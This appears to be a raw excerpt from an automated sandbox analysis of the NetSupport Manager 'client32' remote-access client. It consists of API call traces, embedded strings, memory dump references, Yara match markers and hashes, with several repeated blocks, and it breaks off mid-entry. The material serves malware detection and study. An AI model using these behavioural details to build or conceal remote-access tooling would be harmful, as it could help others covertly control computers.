                                                                                                                                        • wsprintfA.USER32 ref: 11027F01
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 11027F17
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 11027F20
                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002), ref: 11027F81
                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 11027F95
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                                                                                        • String ID: "$Locales\%d\$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                                                                        • API String ID: 512045693-1744591295
                                                                                                                                        • Opcode ID: 0c549729b7108691d0ef4b476a02272bb4edcc2e78ff917f042e0d38bced481d
                                                                                                                                        • Instruction ID: 42811afe57253d3bd896070464278dee24b8baf42e1d510c4721ed0fe76631d9
                                                                                                                                        • Opcode Fuzzy Hash: 0c549729b7108691d0ef4b476a02272bb4edcc2e78ff917f042e0d38bced481d
                                                                                                                                        • Instruction Fuzzy Hash: 7A41E874E04229ABD710CF69CCC5FEAF7B9EB44708F4081A9F95997244DBB0A940CFA0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 11141AB0: _memset.LIBCMT ref: 11141AF5
                                                                                                                                          • Part of subcall function 11141AB0: GetVersionExA.KERNEL32(?), ref: 11141B0E
                                                                                                                                          • Part of subcall function 11141AB0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141B35
                                                                                                                                          • Part of subcall function 11141AB0: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141B47
                                                                                                                                          • Part of subcall function 11141AB0: FreeLibrary.KERNEL32(00000000), ref: 11141B5F
                                                                                                                                          • Part of subcall function 11141AB0: GetSystemDefaultLangID.KERNEL32 ref: 11141B6A
                                                                                                                                        • AdjustWindowRectEx.USER32(1113DE08,00CE0000,00000001,00000001), ref: 111312A7
                                                                                                                                        • LoadMenuA.USER32(00000000,000003EC), ref: 111312B8
                                                                                                                                        • GetSystemMetrics.USER32(00000021), ref: 111312C9
                                                                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 111312D1
                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 111312D7
                                                                                                                                        • GetDC.USER32(00000000), ref: 111312E3
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 111312EE
                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 111312FA
                                                                                                                                        • CreateWindowExA.USER32(00000001,NSMWClass,02600AC8,00CE0000,80000000,80000000,1113DE08,?,00000000,?,11000000,00000000), ref: 1113134F
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,110F58A9,00000001,1113DE08,_debug), ref: 11131357
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                                                                        • String ID: Fs$CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                                                                        • API String ID: 1594747848-4184434473
                                                                                                                                        • Opcode ID: f79aa2a339231c942e312d8c047aaa8dcd578a5d72aad0640aa64dc35281c2a5
                                                                                                                                        • Instruction ID: c1c99cb922432dc138ba9c202a31cb7aa0d0c26f00a3c7d74779ab3f3301680f
                                                                                                                                        • Opcode Fuzzy Hash: f79aa2a339231c942e312d8c047aaa8dcd578a5d72aad0640aa64dc35281c2a5
                                                                                                                                        • Instruction Fuzzy Hash: 51318371E00219AFDB109FE58C85FBFFBB8EB88704F204528FA11F7284D67469408BA5
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1110C340: SetEvent.KERNEL32(00000000), ref: 1110C364
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C075
                                                                                                                                        • GetTickCount.KERNEL32 ref: 1102C09A
                                                                                                                                          • Part of subcall function 110CE440: __strdup.LIBCMT ref: 110CE45A
                                                                                                                                        • GetTickCount.KERNEL32 ref: 1102C194
                                                                                                                                          • Part of subcall function 110CF0A0: wvsprintfA.USER32(?,?,1102C131), ref: 110CF0CB
                                                                                                                                          • Part of subcall function 110CE4F0: _free.LIBCMT ref: 110CE51D
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C28C
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 1102C2A8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                                                                                        • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                        • API String ID: 596640303-1725438197
                                                                                                                                        • Opcode ID: ca546581657441e05077a34b56213b1af863b05488aca0afde80116b0eacc2e3
                                                                                                                                        • Instruction ID: 3aa9c337b4ddfc5cec58a31574b691e2179c4186c787a947626ae142730ffe10
                                                                                                                                        • Opcode Fuzzy Hash: ca546581657441e05077a34b56213b1af863b05488aca0afde80116b0eacc2e3
                                                                                                                                        • Instruction Fuzzy Hash: FD81A534E0015A9BDB04DBE4CD90FEDF7B5AF45708F508698E92567281DF34BA09CB61
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,?,?,00000001), ref: 11060CFA
                                                                                                                                          • Part of subcall function 110606E0: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106071C
                                                                                                                                          • Part of subcall function 110606E0: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11060774
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 11060D4B
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11060E05
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 11060E21
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Enum$Open$CloseValue
                                                                                                                                        • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                                                                        • API String ID: 2823542970-1528906934
                                                                                                                                        • Opcode ID: b877e26e7d009999af9ff80ad30fe88221b222cadef016393b27e04480797841
                                                                                                                                        • Instruction ID: 58f2a140e2c2e5d4e6e19389d5fc2da1bb8dcdaa9b5c120dc596b7fa4edf654c
                                                                                                                                        • Opcode Fuzzy Hash: b877e26e7d009999af9ff80ad30fe88221b222cadef016393b27e04480797841
                                                                                                                                        • Instruction Fuzzy Hash: 834172B5E4022DABE721CB11CC81FEEF7BCEB54708F1041D9E658A6140DAB06E81CFA5
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                        • GetTickCount.KERNEL32 ref: 11134B22
                                                                                                                                          • Part of subcall function 11095C90: CoInitialize.OLE32(00000000), ref: 11095CA4
                                                                                                                                          • Part of subcall function 11095C90: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,11134B2B), ref: 11095CBE
                                                                                                                                          • Part of subcall function 11095C90: CoCreateInstance.OLE32(?,00000000,00000001,111BBFCC,?,?,?,?,?,?,?,11134B2B), ref: 11095CDB
                                                                                                                                          • Part of subcall function 11095C90: CoUninitialize.OLE32(?,?,?,?,?,?,11134B2B), ref: 11095CF9
                                                                                                                                        • GetTickCount.KERNEL32 ref: 11134B31
                                                                                                                                        • _memset.LIBCMT ref: 11134B73
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 11134B89
                                                                                                                                        • _strrchr.LIBCMT ref: 11134B98
                                                                                                                                        • _free.LIBCMT ref: 11134BEA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                                                                                        • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                                                                        • API String ID: 711243594-1270230032
                                                                                                                                        • Opcode ID: 7f73c592d2f4cebf0d14d0daa45c6ac975457230d299cd01f04b673b457344e7
                                                                                                                                        • Instruction ID: 780d96002ff1c571f3ab58ca649bc9daa74988097748e2877fc37ba21b2c8ed0
                                                                                                                                        • Opcode Fuzzy Hash: 7f73c592d2f4cebf0d14d0daa45c6ac975457230d299cd01f04b673b457344e7
                                                                                                                                        • Instruction Fuzzy Hash: C541AE76E0022D9BD720DBB59C41BEBF768DB5531CF0044BAED1997240EA71AA84CFE1
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,?,?,00000001), ref: 11060CFA
                                                                                                                                          • Part of subcall function 110606E0: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106071C
                                                                                                                                          • Part of subcall function 110606E0: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11060774
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 11060D4B
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11060E05
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 11060E21
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Enum$Open$CloseValue
                                                                                                                                        • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                                                                        • API String ID: 2823542970-1528906934
                                                                                                                                        • Opcode ID: f23a291274605c94f5649de291e9e8324e3c99fa834c61925fb639831643f0e0
                                                                                                                                        • Instruction ID: cd76c2840a1715f7d7d399ef9620e7e6cb5bc654635ea96c8559331baeb526dc
                                                                                                                                        • Opcode Fuzzy Hash: f23a291274605c94f5649de291e9e8324e3c99fa834c61925fb639831643f0e0
                                                                                                                                        • Instruction Fuzzy Hash: BF417175B4022DABEB21CA11CC81FEEB77CEB54708F1041D9F659A6140DBB06A85CBA5
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,?,?,00000001), ref: 11060CFA
                                                                                                                                          • Part of subcall function 110606E0: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106071C
                                                                                                                                          • Part of subcall function 110606E0: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11060774
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 11060D4B
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11060E05
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 11060E21
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Enum$Open$CloseValue
                                                                                                                                        • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                                                                        • API String ID: 2823542970-1528906934
                                                                                                                                        • Opcode ID: ca7f9e88603ec94af0442a3bac3499ff9c93757cb3b1ec3ef02441429a95366a
                                                                                                                                        • Instruction ID: 375c621035b705b1b9e3f4a5420693f98d17ac4dbe140293a3c4dc63feaf086a
                                                                                                                                        • Opcode Fuzzy Hash: ca7f9e88603ec94af0442a3bac3499ff9c93757cb3b1ec3ef02441429a95366a
                                                                                                                                        • Instruction Fuzzy Hash: F74181B5B4022DABEB21CA118C81FEEB77CEB54708F1041D5F658A6140DBB06E81CBA5
                                                                                                                                        APIs
                                                                                                                                        • ioctlsocket.WSOCK32 ref: 688F7642
                                                                                                                                        • connect.WSOCK32(00000000,?,?), ref: 688F7659
                                                                                                                                        • WSAGetLastError.WSOCK32(00000000,?,?), ref: 688F7660
                                                                                                                                        • _memmove.LIBCMT ref: 688F76D3
                                                                                                                                        • select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 688F76F3
                                                                                                                                        • GetTickCount.KERNEL32 ref: 688F7717
                                                                                                                                        • ioctlsocket.WSOCK32 ref: 688F775C
                                                                                                                                        • SetLastError.KERNEL32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 688F7762
                                                                                                                                        • WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 688F777A
                                                                                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000), ref: 688F778B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
                                                                                                                                        • String ID: *BlockingIO$ConnectTimeout$General
                                                                                                                                        APIs
                                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,?,?,A0A8B03E), ref: 1102CA84
                                                                                                                                        • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102CA9A
                                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102CAAE
                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CAB5
                                                                                                                                        • Sleep.KERNEL32(00000032), ref: 1102CAC6
                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CAD6
                                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 1102CB22
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 1102CB4F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                                                                        • String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                                                                        APIs
                                                                                                                                        • wsprintfA.USER32 ref: 1112FCF0
                                                                                                                                        • GetTickCount.KERNEL32 ref: 1112FD21
                                                                                                                                        • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 1112FD34
                                                                                                                                        • GetTickCount.KERNEL32 ref: 1112FD3C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountTick$FolderPathwsprintf
                                                                                                                                        • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(?,A0A8B03E), ref: 1105F575
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalEnterSection
                                                                                                                                        • String ID: (NULL)$..\ctl32\Config.cpp$Send EV_CONFIGSET from %s@%d$WARNING: *NOT* Sending EV_CONFIGSET from %s@%d$cfg %x: Set [%s]%s=%s$err == 0$idata->hCurrConfig
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                          • Part of subcall function 11105D40: OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11105E1A
                                                                                                                                          • Part of subcall function 11105D40: CloseHandle.KERNEL32(00000000), ref: 11105E29
                                                                                                                                          • Part of subcall function 11105D40: GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11105E3B
                                                                                                                                          • Part of subcall function 11105D40: LoadLibraryA.KERNEL32(?), ref: 11105E71
                                                                                                                                          • Part of subcall function 11105D40: GetProcAddress.KERNEL32(?,GrabKM), ref: 11105E9E
                                                                                                                                          • Part of subcall function 11105D40: GetProcAddress.KERNEL32(?,LoggedOn), ref: 11105EB6
                                                                                                                                        • GetStockObject.GDI32(0000000D), ref: 11030672
                                                                                                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 11030682
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C0
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C6
                                                                                                                                        • InterlockedExchange.KERNEL32(02378DB8,00001388), ref: 11030746
                                                                                                                                        • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 11030778
                                                                                                                                        • _sprintf.LIBCMT ref: 1103078D
                                                                                                                                        • _setlocale.LIBCMT ref: 11030797
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorModeObjectProc$CloseDirectoryEventExchangeHandleInterlockedLibraryLoadOpenStockSystem_memset_setlocale_sprintfwsprintf
                                                                                                                                        • String ID: .%d$Error %s unloading audiocap dll$pcicl32
                                                                                                                                        • API String ID: 3430446287-3899566344
                                                                                                                                        • Opcode ID: f1f28ec3ab837d54fd286a0c8f1f58c599bf04ba19ecf6f4903bac0d6648c01a
                                                                                                                                        • Instruction ID: 7e43821cc75c177b4768292a53131964eea8ecc700feb9324c3a072739083bb6
                                                                                                                                        • Opcode Fuzzy Hash: f1f28ec3ab837d54fd286a0c8f1f58c599bf04ba19ecf6f4903bac0d6648c01a
                                                                                                                                        • Instruction Fuzzy Hash: B291F8B4D06359DEEF02CBF488447ADFEF6AB8430CF1041AAD445A7289FB755A44CB52
                                                                                                                                        APIs
                                                                                                                                        • GetVersionExA.KERNEL32(111ECE98,76938400), ref: 11141740
                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
                                                                                                                                        • _memset.LIBCMT ref: 1114179D
                                                                                                                                          • Part of subcall function 1113F670: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,76938400,?,?,111417CF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F690
                                                                                                                                        • _strncpy.LIBCMT ref: 1114186A
                                                                                                                                          • Part of subcall function 111601FD: __isdigit_l.LIBCMT ref: 11160222
                                                                                                                                        • RegCloseKey.KERNEL32(00000000), ref: 11141906
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                                                                                        • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                                                                        • API String ID: 3299820421-2117887902
                                                                                                                                        • Opcode ID: b8864b494b3fac32ad8ebd53af7f3ba24bc78c93f4beef13e60cba419166683e
                                                                                                                                        • Instruction ID: 6295e9c0ce894988be5bd3b5eca6cb3bc4700dba655a443855223a39f27a81e3
                                                                                                                                        • Opcode Fuzzy Hash: b8864b494b3fac32ad8ebd53af7f3ba24bc78c93f4beef13e60cba419166683e
                                                                                                                                        • Instruction Fuzzy Hash: A051D975F0022AAFEB21CFA4CC41FEEFBB59B01708F1040A9E519A6181E7707A84CF91
                                                                                                                                        APIs
                                                                                                                                        • _strtok.LIBCMT ref: 11026896
                                                                                                                                        • _strtok.LIBCMT ref: 110268D0
                                                                                                                                        • Sleep.KERNEL32(?,?,*max_sessions,0000000A,00000000), ref: 110269C4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _strtok$Sleep
                                                                                                                                        • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                                                                                        • API String ID: 2009458258-3774545468
                                                                                                                                        • Opcode ID: 5d0b38da53809c6216564b10fa26affc32737c16451f306886d41c61f9b2a0b7
                                                                                                                                        • Instruction ID: 98283bc1e60aabc3c83d60b427db3e00e80f6799957732ebefc1b0d9f7cef5d9
                                                                                                                                        • Opcode Fuzzy Hash: 5d0b38da53809c6216564b10fa26affc32737c16451f306886d41c61f9b2a0b7
                                                                                                                                        • Instruction Fuzzy Hash: 4051F371F0025E9BDB12CFE5CD80BEEFBE9AB84308F504169DC55A7244EB306945C792
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,689067B5), ref: 688F8D6B
                                                                                                                                          • Part of subcall function 688F4F70: LoadLibraryA.KERNEL32(psapi.dll,?,688F8DC8), ref: 688F4F78
                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 688F8DCB
                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 688F8DD8
                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 688F8EBF
                                                                                                                                          • Part of subcall function 688F4FB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 688F4FC4
                                                                                                                                          • Part of subcall function 688F4FB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,688F8E0D,00000000,?,688F8E0D,00000000,?,00000FA0,?), ref: 688F4FE4
                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 688F8EAE
                                                                                                                                          • Part of subcall function 688F5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 688F5014
                                                                                                                                          • Part of subcall function 688F5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,688F8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 688F5034
                                                                                                                                          • Part of subcall function 688F2420: _strrchr.LIBCMT ref: 688F242E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$AddressFileLibraryModuleNameProc$CloseCurrentEnumFreeHandleLoadModulesOpen_strrchr
                                                                                                                                        • String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
                                                                                                                                        • API String ID: 2714439535-3484705551
                                                                                                                                        • Opcode ID: 38568b548633cf90b6978f13c5a0e498d3a54efa6f18a9434d01a8856703a75a
                                                                                                                                        • Instruction ID: f8fc1d3d8f8b43b5fd271c253014971d4046e0ce3e2ccadb9baa843ef29d2846
                                                                                                                                        • Opcode Fuzzy Hash: 38568b548633cf90b6978f13c5a0e498d3a54efa6f18a9434d01a8856703a75a
                                                                                                                                        • Instruction Fuzzy Hash: 0F410975A44229AFDB30CB56DC45FEE7378EB85748F800874EA15E3540EB709A45CF60
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 110883C0: UnhookWindowsHookEx.USER32(?), ref: 110883E3
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 110FFE7C
                                                                                                                                        • GetThreadDesktop.USER32(00000000), ref: 110FFE83
                                                                                                                                        • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 110FFE93
                                                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 110FFEA0
                                                                                                                                        • CloseDesktop.USER32(00000000), ref: 110FFEB9
                                                                                                                                        • GetLastError.KERNEL32 ref: 110FFEC1
                                                                                                                                        • CloseDesktop.USER32(00000000), ref: 110FFED7
                                                                                                                                        • GetLastError.KERNEL32 ref: 110FFEDF
                                                                                                                                        Strings
                                                                                                                                        • SetThreadDesktop(%s) ok, xrefs: 110FFEAB
                                                                                                                                        • SetThreadDesktop(%s) failed, e=%d, xrefs: 110FFEC9
                                                                                                                                        • OpenDesktop(%s) failed, e=%d, xrefs: 110FFEE7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                                                                        • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                                                                        • API String ID: 2036220054-60805735
                                                                                                                                        • Opcode ID: 312bc41d0c80e05ecd2e77a132ac577f729ffb3f5c645a3c4c1f69d055c1a107
                                                                                                                                        • Instruction ID: 156f0d79109f07c40c4ac8670e692553d53260d930ebdb42a1d89f925a608cc0
